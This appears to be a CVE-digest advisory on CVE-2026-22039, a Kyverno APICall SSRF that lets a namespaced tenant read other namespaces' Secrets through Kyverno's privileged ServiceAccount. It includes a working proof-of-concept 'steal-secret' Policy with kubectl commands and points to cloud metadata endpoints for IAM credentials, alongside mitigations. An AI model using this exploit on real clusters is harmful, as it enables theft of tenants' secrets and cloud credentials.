Listen to this Post
How CVE-2026-22039 Works
The vulnerability resides in Kyverno’s `APICall` feature, which allows policies to fetch external data via HTTP. Attackers with permission to create a namespaced `Policy` can set a malicious `urlPath` field that points to internal Kubernetes API endpoints or cloud metadata services. Kyverno’s admission controller executes these requests using its own high‑privilege ServiceAccount, with no validation that the target belongs to the policy’s own namespace. This leads to a confused deputy attack: a low‑privilege tenant can force Kyverno to read secrets from other namespaces, create cluster‑wide policies, or access cloud instance metadata (e.g., 169.254.169.254). The attack does not require `cluster-admin` rights – only `Policy` creation permissions in a namespace. Because the response is reflected in `PolicyReport` objects, the attacker can exfiltrate sensitive data such as database credentials, API keys, or IAM tokens.
dailycve form
Platform: Kubernetes/Kyverno
Version: <1.16.3, <1.15.3
Vulnerability: SSRF + PrivilegeEsc
Severity: Critical (CVSS 8.5)
date: 2026-01-27
Prediction: 2026-01-27 (v1.16.3)
What Undercode Say
- Attack chain is a classic confused deputy – Kyverno trusts user‑supplied URLs.
- Affects all multi‑tenant clusters where tenants can create `Policy` resources.
- Cloud metadata endpoints (AWS, GCP, Azure) are prime targets.
Bash commands to reproduce the PoC
Install vulnerable Kyverno v1.16.0
kubectl create namespace kyverno
kubectl create -f https://github.com/kyverno/kyverno/releases/download/v1.16.0/install.yaml
Create malicious policy that reads another namespace’s secret
cat <<EOF | kubectl apply -f -
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: steal-secret
namespace: tenant-a
spec:
rules:
- name: exfil
context:
- name: stolen
apiCall:
method: GET
urlPath: "/api/v1/namespaces/tenant-b/secrets/db-credentials"
validate:
message: "DATA: {{ stolen.data }}"
EOF
Trigger policy
kubectl create configmap trigger -n tenant-a
kubectl get policyreport -n tenant-a -o yaml | grep "DATA:"
Exploit
A malicious tenant with only namespace‑level `Policy` create permissions can:
1. Craft a `Policy` whose `apiCall.urlPath` points to another tenant’s Secret endpoint.
2. Kyverno’s admission controller executes the request with cluster‑wide privileges.
3. The stolen Secret data appears in the `PolicyReport` under the attacker’s namespace.
4. Same technique can reach cloud metadata services (169.254.169.254) to obtain IAM credentials.
Protection from this CVE
- Immediate: Disable the `APICall` feature in multi‑tenant environments.
- Restrict: Allow `Policy` creation only to `cluster-admin` users.
- Network: Use `NetworkPolicy` to block Kyverno’s egress to internal IP ranges.
- Patch: Upgrade to Kyverno v1.16.3 or v1.15.3 (patched versions).
- Long‑term: Implement URL whitelisting and run `APICall` with a low‑privilege ServiceAccount.
Impact
- Complete breach of multi‑tenant isolation – any namespace’s Secrets, ConfigMaps, or cloud credentials can be stolen.
- Attacker can escalate to cloud resources (S3, RDS, etc.) using stolen IAM tokens.
- Privilege escalation to `cluster-admin` by creating malicious `ClusterPolicy` via the vulnerable
apiCall.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

